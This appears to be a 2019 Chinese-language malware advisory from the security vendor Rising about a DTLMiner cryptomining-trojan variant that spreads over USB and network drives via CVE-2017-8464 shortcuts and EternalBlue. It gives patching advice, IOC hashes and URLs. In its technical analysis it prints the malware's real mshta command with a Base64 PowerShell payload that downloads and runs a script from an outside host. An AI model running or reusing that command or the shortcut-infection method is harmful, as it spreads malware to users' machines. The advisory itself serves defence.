瑞星:不打补丁的请警惕DTL最新变种

2019-08-02   

近日, 瑞星安全研究院捕获到挖矿木马病毒“DTLMiner”的最新变种, 该版本增加了新的传播途径并同时利用了“震网三代”CVE-2017-8464和“永恒之蓝”漏洞,相对系统版本较低的企业用户来说,一旦不能及时更新补丁,病毒就会通过移动磁盘和网络磁盘对用户主机进行感染,导致电脑运行缓慢、大量消耗、死机或电脑寿命降低等后果。

近日, 瑞星安全研究院捕获到挖矿木马病毒“DTLMiner”的最新变种, 该版本增加了新的传播途径并同时利用了“震网三代”CVE-2017-8464和“永恒之蓝”漏洞,相对系统版本较低的企业用户来说,一旦不能及时更新补丁,病毒就会通过移动磁盘和网络磁盘对用户主机进行感染,导致电脑运行缓慢、大量消耗、死机或电脑寿命降低等后果。

瑞星安全专家分析,“DTLMiner”的最新变种通过移动磁盘和网络磁盘传播,病毒每隔5秒便会检测最新接入的可移动磁盘和网络磁盘,并尝试投放感染文件,只要用户打开了被感染的磁盘文件夹, 无需交互病毒便可在用户主机中运行,因此传播性变得更加强大。

从瑞星安全研究院的分析报告来看,“DTLMiner”病毒已持续更新了数次,不断的变种不仅扩大了病毒的攻击面积,还增加了病毒躲避查杀的能力,因此对于个人及企业用户来说,都是危害性极高的。此次最新变种不仅利用了之前的“永恒之蓝”漏洞,还增加了“震网三代”CVE-2017-8464漏洞,因此建议广大用户应及时对电脑安装补丁,以防病毒传播。同时,瑞星ESM已可查杀“DTLMiner”病毒最新变种,广大用可下载安装使用。

在此,为防止用户感染此类病毒,瑞星安全专家提出以下建议:

  1. 安装“永恒之蓝”漏洞和“震网三代”CVE-2017-8464漏洞补丁,防止病毒通过漏洞植入;
  2. 系统、设备或数据库不要使用弱口令账号密码;
  3. 多台设备不要使用相同密码,病毒会抓取本机密码,攻击局域网中的其它机器;
  4. 安装安全有效的杀毒软件,保持防护开启。

技术分析

在最新的样本中DTLMiner硬编码保存了两个具有下载恶意病毒功能的DLL文件, 分别是32与64位版本。

图:blue3/blue6.bin

在PowerShell中新增加一段C#代码, 每隔5秒便检测最新接入的可移动磁盘和网络磁盘并尝试投放感染文件。

图:磁盘感染功能

遍历系统中的可移动磁盘、网络磁盘, 对未感染过的磁盘投放病毒文件同时加入过滤列表下次不再检查。

图:监控新磁盘的接入

检查磁盘类型, 针对FAT32或NTFS格式的可移动磁盘或网络磁盘类型进行感染操作。

图:检测文件类型

利用CVE-2017-8464漏洞构造快捷方式文件, 将blue3/blue6.bin与快捷方式文件写入到目标磁盘中。

图:在目标磁盘创建感染文件

释放blue3.bin、blue6.bin恶意文件下载器DLL到目标磁盘。

图:释放下载器DLL

在磁盘中释放的文件如下所示, 其中blue3.bin是32位的DLL, blue6是64位DLL. 由于利用CVE-2017-8464这个漏洞的必须给予绝对路径, 而系统加载U盘是根据剩余可分配的盘符来决定的, DTLMiner提前构造了[D-K] 8个盘符的lnk文件, 从而实现稳定的漏洞利用。

图:在可移动磁盘释放恶意文件

.lnk链接文件利用了CVE-2017-8464漏洞, 无需用户操作, 只要用户浏览了感染文件对应的磁盘就会主动加载DLL文件。

图:CVE-2017-8464漏洞

创建互斥体“MGYnGYPf”防止重复执行, 创建进程rundll32.exe, 通过rundll32.exe执行一段ShellCode。

图:创建Rundll32.exe

ShellCode通过WinExec函数启动mshta执行经过Base64编码的Powshell命令下载DTLMiner执行。

mshta vbscript:createobject("wscript.shell").run("powershell -nop -e JABsAGYAPQAkAGUAbgB2ADoAdABtAHAAKwAnAFwAawBkAGwAcwA5ADIAagBzAGoAcQBzADAALgB1AHMAYgAnADsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABsAGYAKQApAHsASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdAAuAHoAZQByADIALgBjAG8AbQAvAHUAcwBiAC4AagBzAHAAJwApADsAbgBlAHcALQBpAHQAZQBtACAAJABsAGYAIAAtAHQAeQBwAGUAIABmAGkAbABlAH0A",0)(window.close)
图:通过WinExec启动mshta

Base64解码后脚本如下,将通过http://t.zer2.com下载usb.jsp脚本。

图:解码后下载脚本

usb.jsp脚本内容同以前的版本相同,在用户主机执行后续挖矿流程。

图:挖矿操作

IOC

MD5:

9ABFFFAF7A4877C9187C3F8A6E59B065
F1BF55BA24D1A05E80A7CA1D6774AB3D
63F0D100FA83E31ADB4114848FA5E993

URL:

t.zer2.com/usb.jsp
t.zer2.com/v.js
t.awcna.com/v.js
t.amxny.com/v.js
t.zer2.com/v.jsp
down.ackng.com/if.bin
down.ackng.com/m6.bin
down.ackng.com/m3.bin

[责任编辑:瑞瑞]